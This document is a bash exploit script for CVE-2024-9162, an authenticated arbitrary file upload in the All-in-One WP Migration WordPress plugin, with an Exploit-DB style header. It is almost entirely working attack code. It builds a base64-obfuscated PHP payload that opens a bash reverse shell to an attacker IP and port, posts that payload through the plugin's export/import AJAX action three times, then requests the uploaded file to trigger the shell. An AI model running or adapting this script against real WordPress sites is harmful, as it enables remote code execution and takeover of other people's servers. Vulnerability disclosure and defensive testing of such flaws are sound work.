CVE-2024-9162.sh

# Exploit Title: All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary File Upload
# Date: 09/29/2024
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage:  https://servmask.com/
# Version: <= 7.86
# Tested on: 7.86
# CVE : CVE-2024-9162
#!/bin/bash

# Show example usage of this exploit script. 
show_usage () {
  echo "Example Usage: "
  echo "   ./CVE-2024-9162.sh https://wordpress.hacker PwrqqK3UHQJo 192.168.100.86 4444"
}

XFILE_NAME=CVE-2024-9162.php    # Change if you'd like.
XDIRECTORY_NAME=CVE-2024-9162   # Change if you'd like.

# Validate required arguments for victim url, secret key, attacker ip and lisening port. 
if [ "$#" -eq 4 ]; then
  VICTIM_URL=$1
  SECRET_KEY=$2
  ATTACKER_IP=$3
  ATTACKER_PORT=$4
else
  show_usage
  exit 1
fi

# Exploit Payload
PAYLOAD="shell_exec('bash -c \"/bin/bash -i >& /dev/tcp/$3/$4 0>&1 \" 2>/dev/null');"
PAYLOAD=$(echo -n $PAYLOAD | base64)
PAYLOAD="<?php eval(base64_decode('$PAYLOAD')); ?>"

# URL encode the payload before it's sent.
PAYLOAD=$(echo $PAYLOAD | jq --slurp --raw-input --raw-output @uri)

PRIORITY_INT=30
curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \
    --data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \
    $"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1"

PRIORITY_INT=50
curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \
    --data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \
    $"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1"

PRIORITY_INT=60
curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \
    --data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \
    $"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1"


# TRIGGER THE EXPLOIT CODE, 
echo "Triggering exploit, check your listener..."
curl -k --max-time 0 https://wordpress.hacker/wp-content/plugins/all-in-one-wp-migration/storage/$XDIRECTORY_NAME/$XFILE_NAME